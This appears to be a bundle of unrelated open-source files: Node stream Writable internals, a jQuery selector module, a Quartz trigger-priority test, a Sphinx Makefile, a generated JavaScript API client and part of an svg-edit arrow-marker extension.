doWrite(stream, state, true, state.length, buffer, '', holder.finish);
// doWrite is almost always async, defer these to save a bit of time
// as the hot path ends with doWrite
state.pendingcb++;
state.lastBufferedRequest = null;
// Recycle (or replace) the corked-request holder for the next batch.
if (holder.next) {
state.corkedRequestsFree = holder.next;
holder.next = null;
} else {
state.corkedRequestsFree = new CorkedRequest(state);
}
} else {
// Slow case, write chunks one-by-one
while (entry) {
var chunk = entry.chunk;
var encoding = entry.encoding;
var cb = entry.callback;
var len = state.objectMode ? 1 : chunk.length;
doWrite(stream, state, false, len, chunk, encoding, cb);
entry = entry.next;
// if we didn't call the onwrite immediately, then
// it means that we need to wait until it does.
// also, that means that the chunk and cb are currently
// being processed, so move the buffer counter past them.
if (state.writing) {
break;
}
}
if (entry === null) state.lastBufferedRequest = null;
}
// NOTE(review): the count resets to 0 even when entries remain after an
// early break; it is rebuilt as new writes arrive — matches upstream
// readable-stream, but confirm before relying on the count elsewhere.
state.bufferedRequestCount = 0;
state.bufferedRequest = entry;
state.bufferProcessing = false;
}
// Subclasses must override _write(); the default just reports an error.
Writable.prototype._write = function (chunk, encoding, cb) {
cb(new Error('_write() is not implemented'));
};
// Optional batched write; null signals "not supported" to clearBuffer().
Writable.prototype._writev = null;
// Signal that no more data will be written. Optionally writes a final
// chunk, fully uncorks, and arranges for 'finish' (invoking `cb` then).
Writable.prototype.end = function (chunk, encoding, cb) {
var state = this._writableState;
// end(cb) / end(chunk, cb) argument shuffling.
if (typeof chunk === 'function') {
cb = chunk;
chunk = null;
encoding = null;
} else if (typeof encoding === 'function') {
cb = encoding;
encoding = null;
}
if (chunk !== null && chunk !== undefined) this.write(chunk, encoding);
// .end() fully uncorks
if (state.corked) {
state.corked = 1;
this.uncork();
}
// ignore unnecessary end() calls.
if (!state.ending && !state.finished) endWritable(this, state, cb);
};
// A writable can finish once end() was called, every buffered byte has been
// flushed, and no write is currently in flight.
function needFinish(state) {
  if (!state.ending) return false;
  if (state.finished || state.writing) return false;
  return state.length === 0 && state.bufferedRequest === null;
}

// Run the user-supplied _final hook; when it completes, emit 'prefinish'
// (reporting any error first) and re-check whether the stream can finish.
function callFinal(stream, state) {
  stream._final(function (err) {
    state.pendingcb--;
    if (err) stream.emit('error', err);
    state.prefinished = true;
    stream.emit('prefinish');
    finishMaybe(stream, state);
  });
}
// Arrange for the 'prefinish' event: run _final once (deferred to the next
// tick) when the subclass provides it, otherwise emit immediately.
function prefinish(stream, state) {
  if (state.prefinished || state.finalCalled) return;
  if (typeof stream._final === 'function') {
    state.pendingcb++;
    state.finalCalled = true;
    processNextTick(callFinal, stream, state);
  } else {
    state.prefinished = true;
    stream.emit('prefinish');
  }
}

// Emit 'finish' when the stream is ended, fully drained, and every pending
// callback has settled. Returns whether the stream was ready to finish.
function finishMaybe(stream, state) {
  var ready = needFinish(state);
  if (ready) {
    prefinish(stream, state);
    if (state.pendingcb === 0) {
      state.finished = true;
      stream.emit('finish');
    }
  }
  return ready;
}
// Transition the stream into its ended state after end(): try to finish
// now, and schedule (or defer via 'finish') the user's callback.
function endWritable(stream, state, cb) {
  state.ending = true;
  finishMaybe(stream, state);
  if (cb) {
    if (state.finished) {
      processNextTick(cb);
    } else {
      stream.once('finish', cb);
    }
  }
  state.ended = true;
  stream.writable = false;
}
// Settle every write that was batched into one corked _writev call: invoke
// each buffered callback with the batch's result, then recycle the holder
// object onto the corkedRequestsFree list.
function onCorkedFinish(corkReq, state, err) {
  var entry = corkReq.entry;
  corkReq.entry = null;
  for (; entry; entry = entry.next) {
    state.pendingcb--;
    entry.callback(err);
  }
  if (state.corkedRequestsFree) {
    state.corkedRequestsFree.next = corkReq;
  } else {
    state.corkedRequestsFree = corkReq;
  }
}
// `destroyed` mirrors the flag on _writableState: reads before construction
// report false, and writes before construction are ignored.
Object.defineProperty(Writable.prototype, 'destroyed', {
  get: function () {
    var state = this._writableState;
    return state === undefined ? false : state.destroyed;
  },
  set: function (value) {
    // we ignore the value if the stream has not been initialized yet
    if (!this._writableState) {
      return;
    }
    // backward compatibility: the user is explicitly managing destroyed
    this._writableState.destroyed = value;
  }
});
// Destruction plumbing is shared with Readable via the destroyImpl helpers.
Writable.prototype.destroy = destroyImpl.destroy;
Writable.prototype._undestroy = destroyImpl.undestroy;
// Default _destroy: end the stream, then report any error to the callback.
Writable.prototype._destroy = function (err, cb) {
this.end();
cb(err);
}; | {
"pile_set_name": "Github"
} |
define( [
"./core",
"./var/document",
"./var/documentElement",
"./var/hasOwn",
"./var/indexOf"
], function( jQuery, document, documentElement, hasOwn, indexOf ) {
"use strict";
/*
* Optional (non-Sizzle) selector module for custom builds.
*
* Note that this DOES NOT SUPPORT many documented jQuery
* features in exchange for its smaller size:
*
* Attribute not equal selector
* Positional selectors (:first; :eq(n); :odd; etc.)
* Type selectors (:input; :checkbox; :button; etc.)
* State-based selectors (:animated; :visible; :hidden; etc.)
* :has(selector)
* :not(complex selector)
* custom selectors via Sizzle extensions
* Leading combinators (e.g., $collection.find("> *"))
* Reliable functionality on XML fragments
* Requiring all parts of a selector to match elements under context
* (e.g., $div.find("div > *") now matches children of $div)
* Matching against non-elements
* Reliable sorting of disconnected nodes
* querySelectorAll bug fixes (e.g., unreliable :focus on WebKit)
*
* If any of these are unacceptable tradeoffs, either use Sizzle or
* customize this stub for the project's specific needs.
*/
// Module-scope sort/dedup state plus a feature-detected matchesSelector.
// `sortStable` probes whether Array#sort is stable on this engine;
// `sortInput` preserves original order for disconnected-node ties.
var hasDuplicate, sortInput,
sortStable = jQuery.expando.split( "" ).sort( sortOrder ).join( "" ) === jQuery.expando,
matches = documentElement.matches ||
documentElement.webkitMatchesSelector ||
documentElement.mozMatchesSelector ||
documentElement.oMatchesSelector ||
documentElement.msMatchesSelector,
// CSS string/identifier serialization
// https://drafts.csswg.org/cssom/#common-serializing-idioms
rcssescape = /([\0-\x1f\x7f]|^-?\d)|^-$|[^\x80-\uFFFF\w-]/g,
fcssescape = function( ch, asCodePoint ) {
if ( asCodePoint ) {
// U+0000 NULL becomes U+FFFD REPLACEMENT CHARACTER
if ( ch === "\0" ) {
return "\uFFFD";
}
// Control characters and (dependent upon position) numbers get escaped as code points
return ch.slice( 0, -1 ) + "\\" + ch.charCodeAt( ch.length - 1 ).toString( 16 ) + " ";
}
// Other potentially-special ASCII characters get backslash-escaped
return "\\" + ch;
};
// Document-order comparator used by uniqueSort(); flags duplicates via the
// module-level hasDuplicate. Disconnected nodes sort relative to the
// preferred document, falling back to their position in sortInput.
function sortOrder( a, b ) {
// Flag for duplicate removal
if ( a === b ) {
hasDuplicate = true;
return 0;
}
// Sort on method existence if only one input has compareDocumentPosition
var compare = !a.compareDocumentPosition - !b.compareDocumentPosition;
if ( compare ) {
return compare;
}
// Calculate position if both inputs belong to the same document
compare = ( a.ownerDocument || a ) === ( b.ownerDocument || b ) ?
a.compareDocumentPosition( b ) :
// Otherwise we know they are disconnected
1;
// Disconnected nodes
if ( compare & 1 ) {
// Choose the first element that is related to our preferred document
if ( a === document || a.ownerDocument === document &&
jQuery.contains( document, a ) ) {
return -1;
}
if ( b === document || b.ownerDocument === document &&
jQuery.contains( document, b ) ) {
return 1;
}
// Maintain original order
return sortInput ?
( indexOf.call( sortInput, a ) - indexOf.call( sortInput, b ) ) :
0;
}
// Bitmask: 4 (DOCUMENT_POSITION_FOLLOWING) means b follows a.
return compare & 4 ? -1 : 1;
}
// Sort a collection into document order and remove duplicates in place.
function uniqueSort( results ) {
var elem,
duplicates = [],
j = 0,
i = 0;
hasDuplicate = false;
sortInput = !sortStable && results.slice( 0 );
results.sort( sortOrder );
if ( hasDuplicate ) {
// Duplicates are adjacent after sorting: record their indices, then
// splice from the end so earlier indices stay valid.
while ( ( elem = results[ i++ ] ) ) {
if ( elem === results[ i ] ) {
j = duplicates.push( i );
}
}
while ( j-- ) {
results.splice( duplicates[ j ], 1 );
}
}
// Clear input after sorting to release objects
// See https://github.com/jquery/sizzle/pull/225
sortInput = null;
return results;
}
// Escape an arbitrary string for safe use inside a CSS selector.
function escape( sel ) {
return ( sel + "" ).replace( rcssescape, fcssescape );
}
// Public jQuery static API backed by native querySelectorAll instead of
// Sizzle; see the tradeoffs listed at the top of this module.
jQuery.extend( {
uniqueSort: uniqueSort,
unique: uniqueSort,
escapeSelector: escape,
// Collect elements matching `selector` under `context` into `results`;
// when `seed` is given, filter those candidates instead of querying.
find: function( selector, context, results, seed ) {
var elem, nodeType,
i = 0;
results = results || [];
context = context || document;
// Same basic safeguard as Sizzle
if ( !selector || typeof selector !== "string" ) {
return results;
}
// Early return if context is not an element or document
if ( ( nodeType = context.nodeType ) !== 1 && nodeType !== 9 ) {
return [];
}
if ( seed ) {
while ( ( elem = seed[ i++ ] ) ) {
if ( jQuery.find.matchesSelector( elem, selector ) ) {
results.push( elem );
}
}
} else {
jQuery.merge( results, context.querySelectorAll( selector ) );
}
return results;
},
// Text content of an element, an array of nodes, or a text/CDATA node.
text: function( elem ) {
var node,
ret = "",
i = 0,
nodeType = elem.nodeType;
if ( !nodeType ) {
// If no nodeType, this is expected to be an array
while ( ( node = elem[ i++ ] ) ) {
// Do not traverse comment nodes
ret += jQuery.text( node );
}
} else if ( nodeType === 1 || nodeType === 9 || nodeType === 11 ) {
// Use textContent for elements
return elem.textContent;
} else if ( nodeType === 3 || nodeType === 4 ) {
return elem.nodeValue;
}
// Do not include comment or processing instruction nodes
return ret;
},
// Is `b` inside `a`? Documents are compared via their documentElement.
contains: function( a, b ) {
var adown = a.nodeType === 9 ? a.documentElement : a,
bup = b && b.parentNode;
return a === bup || !!( bup && bup.nodeType === 1 && adown.contains( bup ) );
},
isXMLDoc: function( elem ) {
// documentElement is verified for cases where it doesn't yet exist
// (such as loading iframes in IE - #4833)
var documentElement = elem && ( elem.ownerDocument || elem ).documentElement;
return documentElement ? documentElement.nodeName !== "HTML" : false;
},
expr: {
attrHandle: {},
match: {
// Boolean attributes, consulted by jQuery's attribute handling.
bool: new RegExp( "^(?:checked|selected|async|autofocus|autoplay|controls|defer" +
"|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped)$", "i" ),
// Selectors that need a context element (leading combinators).
needsContext: /^[\x20\t\r\n\f]*[>+~]/
}
}
} );
// Sizzle-compatible helpers hung off jQuery.find.
jQuery.extend( jQuery.find, {
// Filter `elements` down to those matching `expr`.
matches: function( expr, elements ) {
return jQuery.find( expr, null, null, elements );
},
matchesSelector: function( elem, expr ) {
return matches.call( elem, expr );
},
// Attribute lookup that honors registered attrHandle hooks.
attr: function( elem, name ) {
var fn = jQuery.expr.attrHandle[ name.toLowerCase() ],
// Don't get fooled by Object.prototype properties (jQuery #13807)
value = fn && hasOwn.call( jQuery.expr.attrHandle, name.toLowerCase() ) ?
fn( elem, name, jQuery.isXMLDoc( elem ) ) :
undefined;
return value !== undefined ? value : elem.getAttribute( name );
}
} );
} );
| {
"pile_set_name": "Github"
} |
import './gulp/dev';
import './gulp/examples';
import './gulp/docs';
| {
"pile_set_name": "Github"
} |
/*
* All content copyright Terracotta, Inc., unless otherwise indicated. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy
* of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*/
package org.quartz;
import java.util.Calendar;
import java.util.Properties;
import java.util.concurrent.CountDownLatch;
import junit.framework.TestCase;
import org.quartz.impl.JobDetailImpl;
import org.quartz.impl.StdSchedulerFactory;
import org.quartz.impl.triggers.SimpleTriggerImpl;
import org.quartz.spi.MutableTrigger;
/**
* Test Trigger priority support.
*/
public class PriorityTest extends TestCase {
// Released once both triggers have fired; `result` records firing order.
private static CountDownLatch latch;
private static StringBuffer result;
@SuppressWarnings("deprecation")
public static class TestJob implements StatefulJob {
// Appends the firing trigger's name so the tests can assert execution order.
public void execute(JobExecutionContext context)
throws JobExecutionException {
result.append(context.getTrigger().getKey().getName());
latch.countDown();
}
}
@Override
protected void setUp() throws Exception {
PriorityTest.latch = new CountDownLatch(2);
PriorityTest.result = new StringBuffer();
}
// With equal (default) priority and a single worker thread, triggers due at
// the same instant fire in scheduling order: T1 then T2.
@SuppressWarnings("deprecation")
public void testSameDefaultPriority() throws Exception {
Properties config = new Properties();
// Single-threaded pool forces strictly serial trigger execution.
config.setProperty("org.quartz.threadPool.threadCount", "1");
config.setProperty("org.quartz.threadPool.class", "org.quartz.simpl.SimpleThreadPool");
Scheduler sched = new StdSchedulerFactory(config).getScheduler();
Calendar cal = Calendar.getInstance();
cal.add(Calendar.SECOND, 1);
MutableTrigger trig1 = new SimpleTriggerImpl("T1", null, cal.getTime());
MutableTrigger trig2 = new SimpleTriggerImpl("T2", null, cal.getTime());
JobDetail jobDetail = new JobDetailImpl("JD", null, TestJob.class);
sched.scheduleJob(jobDetail, trig1);
// Second trigger reuses the same job rather than defining a new one.
trig2.setJobKey(new JobKey(jobDetail.getKey().getName()));
sched.scheduleJob(trig2);
sched.start();
latch.await();
assertEquals("T1T2", result.toString());
sched.shutdown();
}
// A higher-priority trigger (10) must fire before a lower one (5) when both
// are due at the same instant on a single-threaded scheduler.
@SuppressWarnings("deprecation")
public void testDifferentPriority() throws Exception {
Properties config = new Properties();
config.setProperty("org.quartz.threadPool.threadCount", "1");
config.setProperty("org.quartz.threadPool.class", "org.quartz.simpl.SimpleThreadPool");
Scheduler sched = new StdSchedulerFactory(config).getScheduler();
Calendar cal = Calendar.getInstance();
cal.add(Calendar.SECOND, 1);
MutableTrigger trig1 = new SimpleTriggerImpl("T1", null, cal.getTime());
trig1.setPriority(5);
MutableTrigger trig2 = new SimpleTriggerImpl("T2", null, cal.getTime());
trig2.setPriority(10);
JobDetail jobDetail = new JobDetailImpl("JD", null, TestJob.class);
sched.scheduleJob(jobDetail, trig1);
trig2.setJobKey(new JobKey(jobDetail.getKey().getName(), null));
sched.scheduleJob(trig2);
sched.start();
latch.await();
assertEquals("T2T1", result.toString());
sched.shutdown();
}
}
| {
"pile_set_name": "Github"
} |
# Makefile for Sphinx documentation
#

# You can set these variables from the command line.
SPHINXOPTS = -n
SPHINXBUILD = sphinx-build
PAPER =
BUILDDIR = _build
DIAGRAM_BUILD_DIR = _diagrams

# Internal variables.
PAPEROPT_a4 = -D latex_paper_size=a4
PAPEROPT_letter = -D latex_paper_size=letter
ALLSPHINXOPTS = -d $(BUILDDIR)/doctrees $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) .
# the i18n builder cannot share the environment and doctrees with the others
I18NSPHINXOPTS = $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) .

# Every build target is phony. Fix: "texinfo" and "info" were missing from
# the original list, so files or directories by those names would silently
# shadow the targets.
.PHONY: help clean html dirhtml singlehtml pickle json htmlhelp qthelp devhelp epub latex latexpdf text man texinfo info changes linkcheck doctest gettext diagrams
# Print the list of available targets. (Recipes below are tab-indented, as
# required by make; the upstream dump had lost the tabs.)
help:
	@echo "Please use \`make <target>' where <target> is one of"
	@echo " html to make standalone HTML files"
	@echo " diagrams to make diagram images"
	@echo " dirhtml to make HTML files named index.html in directories"
	@echo " singlehtml to make a single large HTML file"
	@echo " pickle to make pickle files"
	@echo " json to make JSON files"
	@echo " htmlhelp to make HTML files and a HTML help project"
	@echo " qthelp to make HTML files and a qthelp project"
	@echo " devhelp to make HTML files and a Devhelp project"
	@echo " epub to make an epub"
	@echo " latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter"
	@echo " latexpdf to make LaTeX files and run them through pdflatex"
	@echo " text to make text files"
	@echo " man to make manual pages"
	@echo " texinfo to make Texinfo files"
	@echo " info to make Texinfo files and run them through makeinfo"
	@echo " gettext to make PO message catalogs"
	@echo " changes to make an overview of all changed/added/deprecated items"
	@echo " linkcheck to check all external links for integrity"
	@echo " doctest to run all doctests embedded in the documentation (if enabled)"
clean:
	rm -rf $(BUILDDIR)/*
	rm -rf $(DIAGRAM_BUILD_DIR)/*
# Render PlantUML sources into PNGs consumed by the HTML build.
diagrams:
	mkdir -p $(DIAGRAM_BUILD_DIR)
	plantuml diagrams_src/*.dot
	mv diagrams_src/*.png $(DIAGRAM_BUILD_DIR)/
# HTML build regenerates the diagram images first.
html: diagrams
	$(SPHINXBUILD) -b html $(ALLSPHINXOPTS) $(BUILDDIR)/html
	@echo
	@echo "Build finished. The HTML pages are in $(BUILDDIR)/html."
dirhtml:
	$(SPHINXBUILD) -b dirhtml $(ALLSPHINXOPTS) $(BUILDDIR)/dirhtml
	@echo
	@echo "Build finished. The HTML pages are in $(BUILDDIR)/dirhtml."
singlehtml:
	$(SPHINXBUILD) -b singlehtml $(ALLSPHINXOPTS) $(BUILDDIR)/singlehtml
	@echo
	@echo "Build finished. The HTML page is in $(BUILDDIR)/singlehtml."
pickle:
	$(SPHINXBUILD) -b pickle $(ALLSPHINXOPTS) $(BUILDDIR)/pickle
	@echo
	@echo "Build finished; now you can process the pickle files."
json:
	$(SPHINXBUILD) -b json $(ALLSPHINXOPTS) $(BUILDDIR)/json
	@echo
	@echo "Build finished; now you can process the JSON files."
htmlhelp:
	$(SPHINXBUILD) -b htmlhelp $(ALLSPHINXOPTS) $(BUILDDIR)/htmlhelp
	@echo
	@echo "Build finished; now you can run HTML Help Workshop with the" \
	".hhp project file in $(BUILDDIR)/htmlhelp."
qthelp:
	$(SPHINXBUILD) -b qthelp $(ALLSPHINXOPTS) $(BUILDDIR)/qthelp
	@echo
	@echo "Build finished; now you can run "qcollectiongenerator" with the" \
	".qhcp project file in $(BUILDDIR)/qthelp, like this:"
	@echo "# qcollectiongenerator $(BUILDDIR)/qthelp/PulpDocs.qhcp"
	@echo "To view the help file:"
	@echo "# assistant -collectionFile $(BUILDDIR)/qthelp/PulpDocs.qhc"
devhelp:
	$(SPHINXBUILD) -b devhelp $(ALLSPHINXOPTS) $(BUILDDIR)/devhelp
	@echo
	@echo "Build finished."
	@echo "To view the help file:"
	@echo "# mkdir -p $$HOME/.local/share/devhelp/PulpDocs"
	@echo "# ln -s $(BUILDDIR)/devhelp $$HOME/.local/share/devhelp/PulpDocs"
	@echo "# devhelp"
epub:
	$(SPHINXBUILD) -b epub $(ALLSPHINXOPTS) $(BUILDDIR)/epub
	@echo
	@echo "Build finished. The epub file is in $(BUILDDIR)/epub."
latex:
	$(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex
	@echo
	@echo "Build finished; the LaTeX files are in $(BUILDDIR)/latex."
	@echo "Run \`make' in that directory to run these through (pdf)latex" \
	"(use \`make latexpdf' here to do that automatically)."
latexpdf:
	$(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex
	@echo "Running LaTeX files through pdflatex..."
	$(MAKE) -C $(BUILDDIR)/latex all-pdf
	@echo "pdflatex finished; the PDF files are in $(BUILDDIR)/latex."
text:
	$(SPHINXBUILD) -b text $(ALLSPHINXOPTS) $(BUILDDIR)/text
	@echo
	@echo "Build finished. The text files are in $(BUILDDIR)/text."
man:
	$(SPHINXBUILD) -b man $(ALLSPHINXOPTS) $(BUILDDIR)/man
	@echo
	@echo "Build finished. The manual pages are in $(BUILDDIR)/man."
texinfo:
	$(SPHINXBUILD) -b texinfo $(ALLSPHINXOPTS) $(BUILDDIR)/texinfo
	@echo
	@echo "Build finished. The Texinfo files are in $(BUILDDIR)/texinfo."
	@echo "Run \`make' in that directory to run these through makeinfo" \
	"(use \`make info' here to do that automatically)."
info:
	$(SPHINXBUILD) -b texinfo $(ALLSPHINXOPTS) $(BUILDDIR)/texinfo
	@echo "Running Texinfo files through makeinfo..."
	make -C $(BUILDDIR)/texinfo info
	@echo "makeinfo finished; the Info files are in $(BUILDDIR)/texinfo."
gettext:
	$(SPHINXBUILD) -b gettext $(I18NSPHINXOPTS) $(BUILDDIR)/locale
	@echo
	@echo "Build finished. The message catalogs are in $(BUILDDIR)/locale."
changes:
	$(SPHINXBUILD) -b changes $(ALLSPHINXOPTS) $(BUILDDIR)/changes
	@echo
	@echo "The overview file is in $(BUILDDIR)/changes."
linkcheck:
	$(SPHINXBUILD) -b linkcheck $(ALLSPHINXOPTS) $(BUILDDIR)/linkcheck
	@echo
	@echo "Link check complete; look for any errors in the above output " \
	"or in $(BUILDDIR)/linkcheck/output.txt."
doctest:
	$(SPHINXBUILD) -b doctest $(ALLSPHINXOPTS) $(BUILDDIR)/doctest
	@echo "Testing of doctests in the sources finished, look at the " \
	"results in $(BUILDDIR)/doctest/output.txt."
"pile_set_name": "Github"
} |
import { get,put,postForm,PREFIX,joinParameters,joinPostParameters } from '../../axios/tools'
// Fetch a single RetailStoreFranchising object by its id.
const view = (targetObjectId) => get({
  url: `${PREFIX}retailStoreFranchisingManager/view/${targetObjectId}/`,
})
// Load a RetailStoreFranchising with list parameters (paging, filtering,
// ...) serialized into the URL path.
const load = (targetObjectId, parameters) => {
  const suffix = joinParameters(parameters)
  return get({
    url: `${PREFIX}retailStoreFranchisingManager/loadRetailStoreFranchising/${targetObjectId}/${suffix}/`,
  })
}
// Query candidate objects for a picker dialog; criteria are sent as JSON.
const queryCandidates = ({ scenarioCode, ownerType, ownerId, listType, groupBy, filterKey, targetType }) => {
  const url = `${PREFIX}retailStoreFranchisingManager/queryCandidates/`
  const data = JSON.stringify({ scenarioCode, ownerType, ownerId, listType, groupBy, targetType, filterKey })
  console.log("requestParameters", data)
  return put({ url, data })
}
// Create a retail store under the given franchising record.
const addRetailStore = (targetObjectId, parameters) => {
  const url = `${PREFIX}retailStoreFranchisingManager/addRetailStore/retailStoreFranchisingId/name/telephone/owner/retailStoreCountryCenterId/cityServiceCenterId/creationId/investmentInvitationId/decorationId/openingId/closingId/founded/latitude/longitude/description/tokensExpr/`
  const requestParameters = { ...parameters, retailStoreFranchisingId: targetObjectId, tokensExpr: 'none' }
  return postForm({ url, requestParameters })
}
// Update the editable properties of an existing retail store.
const updateRetailStore = (targetObjectId, parameters) => {
  const url = `${PREFIX}retailStoreFranchisingManager/updateRetailStoreProperties/retailStoreFranchisingId/id/name/telephone/owner/founded/latitude/longitude/description/tokensExpr/`
  const requestParameters = { ...parameters, retailStoreFranchisingId: targetObjectId, tokensExpr: 'none' }
  return postForm({ url, requestParameters })
}
// Remove a batch of retail stores from the franchising record.
const removeRetailStoreList = (targetObjectId, parameters) => {
  const url = `${PREFIX}retailStoreFranchisingManager/removeRetailStoreList/retailStoreFranchisingId/retailStoreIds/tokensExpr/`
  const requestParameters = { ...parameters, retailStoreFranchisingId: targetObjectId, tokensExpr: 'none' }
  return postForm({ url, requestParameters })
}
// Filter this out when no functions
const listFunctions = () => get({
  url: `${PREFIX}retailStoreFranchisingService/listFunctions/`,
})
// Persist the current object graph.
const saveRequest = (data) => put({
  url: `${PREFIX}retailStoreFranchisingService/save/`,
  data,
})
// Run a server-side process action against the object graph.
const processRequest = (data) => put({
  url: `${PREFIX}retailStoreFranchisingService/process/`,
  data,
})
// Public service surface consumed by the UI layer.
const RetailStoreFranchisingService = {
  view,
  load,
  addRetailStore,
  updateRetailStore,
  removeRetailStoreList,
  listFunctions,
  saveRequest,
  processRequest,
  queryCandidates,
}
export default RetailStoreFranchisingService
| {
"pile_set_name": "Github"
} |
/*
* ext-arrows.js
*
* Licensed under the Apache License, Version 2
*
* Copyright(c) 2010 Alexis Deveria
*
*/
svgEditor.addExtension("Arrows", function(S) {
// Canvas plumbing handed in by svg-edit.
var svgcontent = S.svgcontent,
addElem = S.addSvgElementFromJson,
nonce = S.nonce,
randomize_ids = S.randomize_ids,
selElems;
// Track nonce changes so marker element ids stay in sync with the canvas.
svgCanvas.bind('setnonce', setArrowNonce);
svgCanvas.bind('unsetnonce', unsetArrowNonce);
// Translations for the "no arrow" option in the context panel.
var lang_list = {
"en":[
{"id": "arrow_none", "textContent": "No arrow" }
],
"fr":[
{"id": "arrow_none", "textContent": "Sans flèche" }
]
};
var prefix = 'se_arrow_';
if (randomize_ids) {
var arrowprefix = prefix + nonce + '_';
} else {
var arrowprefix = prefix;
}
// Arrowhead path geometry per direction (fw/bk); refx positions the tip
// relative to the line end, id names the shared <marker> element.
var pathdata = {
fw: {d:"m0,0l10,5l-10,5l5,-5l-5,-5z", refx:8, id: arrowprefix + 'fw'},
bk: {d:"m10,0l-10,5l10,5l-5,-5l5,-5z", refx:2, id: arrowprefix + 'bk'}
}
// Recompute the shared marker element ids after the id prefix changed.
function refreshMarkerIds() {
  pathdata.fw.id = arrowprefix + 'fw';
  pathdata.bk.id = arrowprefix + 'bk';
}
// Canvas assigned a nonce: switch to randomized marker ids.
function setArrowNonce(window, n) {
  randomize_ids = true;
  arrowprefix = prefix + n + '_';
  refreshMarkerIds();
}
// Nonce cleared: fall back to the static prefix.
function unsetArrowNonce(window) {
  randomize_ids = false;
  arrowprefix = prefix;
  refreshMarkerIds();
}
// Resolve a url(#id) reference stored in the given attribute to its
// element, or null when the attribute is missing or not a local reference.
function getLinked(elem, attr) {
  var ref = elem.getAttribute(attr);
  if (!ref) return null;
  var match = ref.match(/\(\#(.*)\)/);
  return (match && match.length === 2) ? S.getElem(match[1]) : null;
}
// Show/hide the arrow context panel; when showing, derive the dropdown
// value from the selected element's marker-* attributes.
function showPanel(on) {
$('#arrow_panel').toggle(on);
if(on) {
var el = selElems[0];
var end = el.getAttribute("marker-end");
var start = el.getAttribute("marker-start");
var mid = el.getAttribute("marker-mid");
var val;
if(end && start) {
val = "both";
} else if(end) {
val = "end";
} else if(start) {
val = "start";
} else if(mid) {
val = "mid";
// Backward mid markers are recognized by "bk" in the referenced id.
if(mid.indexOf("bk") != -1) {
val = "mid_bk";
}
}
if(!start && !mid && !end) {
val = "none";
}
$("#arrow_list").val(val);
}
}
// Strip every marker attribute from the first selected element.
function resetMarker() {
var el = selElems[0];
el.removeAttribute("marker-start");
el.removeAttribute("marker-mid");
el.removeAttribute("marker-end");
}
// Ensure a <marker> element for the given direction exists in <defs> and
// return it; `id` defaults to the shared per-direction marker id.
function addMarker(dir, type, id) {
// TODO: Make marker (or use?) per arrow type, since refX can be different
id = id || arrowprefix + dir;
var marker = S.getElem(id);
var data = pathdata[dir];
// NOTE(review): this mutates the shared pathdata entry, so a "mid" marker
// changes the refx later reused by start/end markers of the same
// direction — appears related to the TODO above; confirm before relying on it.
if(type == "mid") {
data.refx = 5;
}
if(!marker) {
marker = addElem({
"element": "marker",
"attr": {
"viewBox": "0 0 10 10",
"id": id,
"refY": 5,
"markerUnits": "strokeWidth",
"markerWidth": 5,
"markerHeight": 5,
"orient": "auto",
"style": "pointer-events:none" // Currently needed for Opera
}
});
var arrow = addElem({
"element": "path",
"attr": {
"d": data.d,
"fill": "#000000"
}
});
marker.appendChild(arrow);
S.findDefs().appendChild(marker);
}
// refX is always refreshed, even when the marker already existed.
marker.setAttribute('refX', data.refx);
return marker;
}
// Change handler for the arrow dropdown: map the chosen option onto the
// selected element's marker-start/mid/end attributes.
function setArrow() {
var type = this.value;
resetMarker();
if(type == "none") {
return;
}
// Set marker on element
var dir = "fw";
if(type == "mid_bk") {
type = "mid";
dir = "bk";
} else if(type == "both") {
// "both" = backward marker at the start plus forward marker at the end.
addMarker("bk", type);
svgCanvas.changeSelectedAttribute("marker-start", "url(#" + pathdata.bk.id + ")");
type = "end";
dir = "fw";
} else if (type == "start") {
dir = "bk";
}
addMarker(dir, type);
svgCanvas.changeSelectedAttribute("marker-"+type, "url(#" + pathdata[dir].id + ")");
S.call("changed", selElems);
}
// Keep arrowhead fill in sync with the element's stroke color: reuse an
// existing same-color/same-shape marker when available, otherwise create
// one, and garbage-collect markers no longer referenced by any element.
function colorChanged(elem) {
var color = elem.getAttribute('stroke');
var mtypes = ['start','mid','end'];
var defs = S.findDefs();
$.each(mtypes, function(i, type) {
var marker = getLinked(elem, 'marker-'+type);
if(!marker) return;
var cur_color = $(marker).children().attr('fill');
var cur_d = $(marker).children().attr('d');
var new_marker = null;
if(cur_color === color) return;
var all_markers = $(defs).find('marker');
// Different color, check if already made
all_markers.each(function() {
var attrs = $(this).children().attr(['fill', 'd']);
if(attrs.fill === color && attrs.d === cur_d) {
// Found another marker with this color and this path
new_marker = this;
}
});
if(!new_marker) {
// Create a new marker with this color
var last_id = marker.id;
var dir = last_id.indexOf('_fw') !== -1?'fw':'bk';
new_marker = addMarker(dir, type, arrowprefix + dir + all_markers.length);
$(new_marker).children().attr('fill', color);
}
$(elem).attr('marker-'+type, "url(#" + new_marker.id + ")");
// Check if last marker can be removed
var remove = true;
$(S.svgcontent).find('line, polyline, path, polygon').each(function() {
var elem = this;
$.each(mtypes, function(j, mtype) {
if($(elem).attr('marker-' + mtype) === "url(#" + marker.id + ")") {
return remove = false;
}
});
if(!remove) return false;
});
// Not found, so can safely remove
if(remove) {
$(marker).remove();
}
});
}
// Extension descriptor consumed by svg-edit: context-panel UI definition
// plus selection/element-change hooks.
return {
name: "Arrows",
context_tools: [{
type: "select",
panel: "arrow_panel",
title: "Select arrow type",
id: "arrow_list",
options: {
none: "No arrow",
end: "---->",
start: "<----",
both: "<--->",
mid: "-->--",
mid_bk: "--<--"
},
defval: "none",
events: {
change: setArrow
}
}],
// Runs once after the UI is built.
callback: function() {
$('#arrow_panel').hide();
// Set ID so it can be translated in locale file
$('#arrow_list option')[0].id = 'connector_no_arrow';
},
// Supplies the per-language strings declared in lang_list above.
addLangData: function(lang) {
return {
data: lang_list[lang]
};
},
// Show the panel only for single-selected marker-capable elements.
selectedChanged: function(opts) {
// Use this to update the current selected elements
selElems = opts.elems;
var i = selElems.length;
